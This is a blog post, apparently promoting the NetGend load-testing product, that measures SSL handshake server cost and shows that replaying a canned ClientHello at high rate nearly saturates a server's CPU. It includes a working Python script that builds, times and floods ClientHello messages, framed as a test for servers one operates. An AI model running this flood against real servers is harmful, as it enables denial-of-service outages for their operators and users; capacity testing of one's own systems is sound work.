Thursday, December 12, 2013

How bad is a security threat?

Recently I met my friend Percy, a technical guru I respect. Our talk inevitably turned to something technical about SSL: how many SSL handshakes can a server support? He sent me an interesting security threat report about DDoS attacks on HTTPS servers.

The report indicates that HTTPS servers may suffer from SSL renegotiation attacks, made easy by the THC tool. Even with renegotiation turned off, the server still spends far more CPU on each handshake than the client does, because of how the SSL protocol is designed: with RSA key exchange the client performs one cheap public-key encryption while the server performs one expensive private-key decryption, and with (EC)DHE suites the server instead signs its key share with the private key, which is just as costly. So the handshake itself remains an attack vector.

To get an idea of how bad the server CPU exhaustion can be, I started Wireshark, the world's best-known packet capture tool, to measure the timing of the SSL handshake. The handshake has multiple steps; the first is that the client sends a ClientHello message to the server. According to Wireshark, just replying to a ClientHello costs the server about 5 ms of intensive computation (my server has an AMD quad-core CPU: Athlon II X4 645, 3.1 GHz). One caveat on what that number means: Wireshark shows the interval between the ClientHello and the server's first reply. With (EC)DHE suites that reply carries the server's private-key signature, so the interval is a fair proxy for the per-handshake cost; with plain RSA key exchange the expensive private-key operation only happens after the client's ClientKeyExchange and would not show up in this interval at all.

Our NetGend platform can set up tens of thousands of concurrent SSL sessions from one box, but the analysis above suggests that the most effective way to DDoS a server is to do as little as possible on the client side while keeping the server busy. Some handshake steps still require nontrivial computation on the client, so it is better to send a canned ClientHello message, which costs the client almost no CPU time. The same bytes can be replayed on every connection: the server starts a fresh handshake, and does its share of the work, for every ClientHello it receives, regardless of where the client random came from.

First we grab the hex representation of the bytes of a ClientHello message from a pcap file (Wireshark's "Copy as Hex Stream" on the record does this) and put them in a file called "clientHello.txt".

The script is quite simple and runs on a slower PC (2.53 GHz CPU), yet when it sends ClientHello messages at about 2,900 per second (spread over multiple connections), the server is almost completely busy (see the highlighted CPU idle percentage). That is consistent with the 5 ms figure: at 5 ms per ClientHello, four cores saturate at roughly 800 hellos per second, so 2,900/s is several times more than the server can keep up with.
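The post's own script is not reproduced here, so the following is an added example of the same procedure, written for this page and not the NetGend code. It builds a valid TLS 1.2 ClientHello from scratch (so no pcap is required), parses one back as a sanity check, can load a canned hello from a hex dump such as clientHello.txt instead, times the server's first flight after the hello (the interval measured with Wireshark above), and replays the canned hello over many connections at a fixed rate. The cipher-suite list, extension set, host and port are assumptions you adjust; run the replay only against a server you operate.

```python
import os
import socket
import struct
import time

# Added example, not the script from the post. Cipher suites offered (IANA values):
# the ECDHE-RSA suites make the server sign its key share in its first flight,
# the plain RSA suites make it decrypt the premaster secret one step later.
CIPHER_SUITES = [0xC02F, 0xC014, 0x009C, 0x002F, 0x0035]


def _ext(ext_type, body):
    return struct.pack("!HH", ext_type, len(body)) + body


def build_client_hello(sni=None, client_random=None):
    """Return one TLS record carrying a TLS 1.2 ClientHello (a 'canned' one if
    client_random is fixed, a fresh one otherwise)."""
    rnd = client_random if client_random is not None else os.urandom(32)
    if len(rnd) != 32:
        raise ValueError("client_random must be 32 bytes")
    suites = b"".join(struct.pack("!H", s) for s in CIPHER_SUITES)
    body = b"\x03\x03" + rnd                          # client_version 1.2, random
    body += b"\x00"                                   # empty session_id
    body += struct.pack("!H", len(suites)) + suites
    body += b"\x01\x00"                               # one compression method: null
    exts = b""
    if sni:
        name = sni.encode("ascii")
        entry = b"\x00" + struct.pack("!H", len(name)) + name     # name_type host_name
        exts += _ext(0x0000, struct.pack("!H", len(entry)) + entry)
    exts += _ext(0x000A, b"\x00\x04\x00\x17\x00\x18")   # supported_groups: P-256, P-384
    exts += _ext(0x000B, b"\x01\x00")                   # ec_point_formats: uncompressed
    exts += _ext(0x000D, b"\x00\x04\x04\x01\x05\x01")   # signature_algorithms: RSA SHA-256/384
    body += struct.pack("!H", len(exts)) + exts
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def parse_client_hello(record):
    """Decode version, random, cipher suites and SNI; ValueError if malformed."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = record[5:5 + struct.unpack("!H", record[3:5])[0]]
    if len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 0
    version, pos = body[pos:pos + 2].hex(), pos + 2
    rnd, pos = body[pos:pos + 32].hex(), pos + 32
    pos += 1 + body[pos]                              # skip session_id
    cs_len = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    suites = [struct.unpack("!H", body[pos + i:pos + i + 2])[0] for i in range(0, cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                              # skip compression methods
    sni = None
    if pos + 2 <= len(body):
        end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            edata, pos = body[pos + 4:pos + 4 + elen], pos + 4 + elen
            if etype == 0 and len(edata) >= 5:
                sni = edata[5:5 + struct.unpack("!H", edata[3:5])[0]].decode("ascii")
    return {"version": version, "random": rnd, "cipher_suites": suites, "sni": sni}


def parse_hex_dump(text):
    """Bytes from a hex dump like clientHello.txt (whitespace and newlines ignored)."""
    return bytes.fromhex("".join(text.split()))


def load_canned_hello(path):
    with open(path) as f:
        return parse_hex_dump(f.read())


def time_first_flight(host, port, hello, timeout=5.0):
    """Seconds from sending the ClientHello to the first byte of the server's reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        t0 = time.perf_counter()
        s.sendall(hello)
        s.recv(1)
        return time.perf_counter() - t0


def send_canned_hellos(host, port, hello, count, per_second):
    """Open `count` connections, send the identical ClientHello on each and read
    nothing back, so the sender does no crypto while the server answers every one.
    Only for load-testing a server you operate. Returns the number of hellos sent."""
    opened = []
    for _ in range(count):
        s = socket.create_connection((host, port), timeout=5.0)
        s.sendall(hello)
        opened.append(s)                               # keep open so replies are not reset early
        time.sleep(1.0 / per_second)
    for s in opened:
        s.close()
    return len(opened)


if __name__ == "__main__":
    import sys
    hello = build_client_hello(sni="localhost")
    print(parse_client_hello(hello))
    if len(sys.argv) == 3:                             # usage: script.py HOST PORT
        ms = 1000 * time_first_flight(sys.argv[1], int(sys.argv[2]), hello)
        print("first flight after ClientHello: %.1f ms" % ms)
```

`time_first_flight` reproduces the Wireshark measurement without a capture: run it a few hundred times against an idle server to get the per-hello cost, then compare with `send_canned_hellos` at the rate you expect to absorb. Remember that a canned hello with a fixed client random is fine for the server side of the test but must never be used for a real session.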

A VM process on that server used to take 10% of one core; it now takes much more, due to CPU contention. While I can still use a real browser to access HTTPS pages, the server is clearly VERY busy.

So it's good to be aware of a possible security threat, and even better to get some idea of how bad it can be; peace of mind matters. NetGend can give you that peace of mind.